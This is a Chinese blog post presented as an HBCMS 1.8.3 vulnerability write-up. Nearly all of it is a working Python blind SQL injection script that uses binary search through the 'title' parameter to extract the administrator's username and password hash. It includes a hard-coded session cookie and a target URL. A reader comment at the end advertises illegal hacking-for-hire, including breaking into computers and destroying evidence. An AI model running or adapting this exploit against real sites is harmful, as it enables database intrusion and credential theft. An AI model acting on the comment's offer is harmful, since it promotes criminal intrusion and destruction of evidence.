漏洞分析

python 盲注 HBCMS 1.8.3 漏洞

根据某文章所写(已经404),应该是需要cookie。做好准备工作,上传个图片。

代码采用二分法,类似于sqlmap的算法

#-*- coding: UTF-8 -*-
__author__ = 'Administrator'

import requests

def post_data(step,p,min,max):
    if step == 1:
        sql_code = "(select length(login_name) from hbcms_users where id=1)>"+str(p)
    if step == 2:
        sql_code = "(select length(login_pass) from hbcms_users where id=1)>"+str(p)
    if step == 3:
        sql_code = "(select mid(login_name,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    if step == 4:
        sql_code = "(select mid(login_pass,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
    return sql_code

header = {  #Cookie需要自己修改
            "Cookie":"visited_page=5629-; bdshare_firstime=1422370057395; PHPSESSION=ep7nhkn8poei9jbckd68j2arr1; HBcmsLogin=19d2c1427b496606c40cdfa0f7139327dca4962953fb8ea0fda93c3b87635c12lbc555; HBcmsLoginName=lbc555; HBcmsLoginID=1122; Hm_lvt_f9fcde02679434efdea208afff286914=1422370057,1422410160; Hm_lpvt_f9fcde02679434efdea208afff286914=1422410945; AJSTAT_ok_pages=28; AJSTAT_ok_times=1; Hm_lvt_a3afd03fd164ca89566a02f9c9db5dad=1422370057,1422410160; Hm_lpvt_a3afd03fd164ca89566a02f9c9db5dad=1422410945"
}
name_len = 1
pass_len = 32
name_con = ""
pass_con = ""
for step in range(1,5):
    if step == 1 or step == 2:
        p = 20
        min = 0
        max = 40
        while(1):
            #print str(max)+":"+str(min)
            if p == 40:
                print "Too long! Fuck you!"
                break
            payload = {
                "show_top_part=":"yes",
                "pageID":"1",
                "category_id":"all",
                "file_type":"0",
                "title":"q%\" and "+ post_data(step,p,0,0) +" and \"%a%\"=\"%a",
                "btnSubmit":"提交"
            }
            r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header) #修改目标url
            if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
                min = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break
            else:
                max = p
                p = int(round((float(max) - float(min))/2)) + min
                if max - min == 1:
                    if step == 1:
                        name_len = p
                        print "username length is "+str(name_len)
                        break
                    if step == 2:
                        pass_len = p
                        print "password length is "+str(pass_len)
                        break

    if step == 3 or step == 4:
        if step == 3:
            end = name_len
        else:
            end = pass_len
        for k in range(1,end+1):
            p = 47
            min = 32
            max = 126
            while(1):
                #print str(max)+":"+str(min)+":"+str(p)
                payload = {
                    "show_top_part=":"yes",
                    "pageID":"1",
                    "category_id":"all",
                    "file_type":"0",
                    "title":"q%\" and "+ post_data(step,k,p,max) +" and \"%a%\"=\"%a",
                    "btnSubmit":"提交"
                }
                r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header)#修改目标url
                if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
                    if max - min == 2:
                        if step == 3:
                            name_con = name_con + chr(p)
                            print "username is "+name_con
                        else:
                            pass_con = pass_con + chr(p)
                            print "password is "+pass_con
                        break
                    if max - min == 1:
                        max = max + 1
                    min = p
                    p = int(round((float(max) - float(min))/2)) + min

                else:
                    if max - min == 1:
                        min = min - 1
                    max = p
                    p = int(round((float(max) - float(min))/2)) + min

 

1 thought on “python 盲注 HBCMS 1.8.3 漏洞

  1. WE CAN HELP YOU TRACE THE ACTUAL LOCATION OF THE PERSON AND DO WHATEVER YOU REQUEST
    TO THE PERSONS COMPUTER IS ANYONE BLACKMAILING YOU ONLINE AND YOU WANT
    US TO GET INTO THEIR COMPUTER AND DESTROY DATA AND EVIDENCES AGAINST
    YOU? If you need a hacking service that is not listed, feel free to
    contact me at: tinglho.federalbroach@gmail.com

发表评论

Captcha Code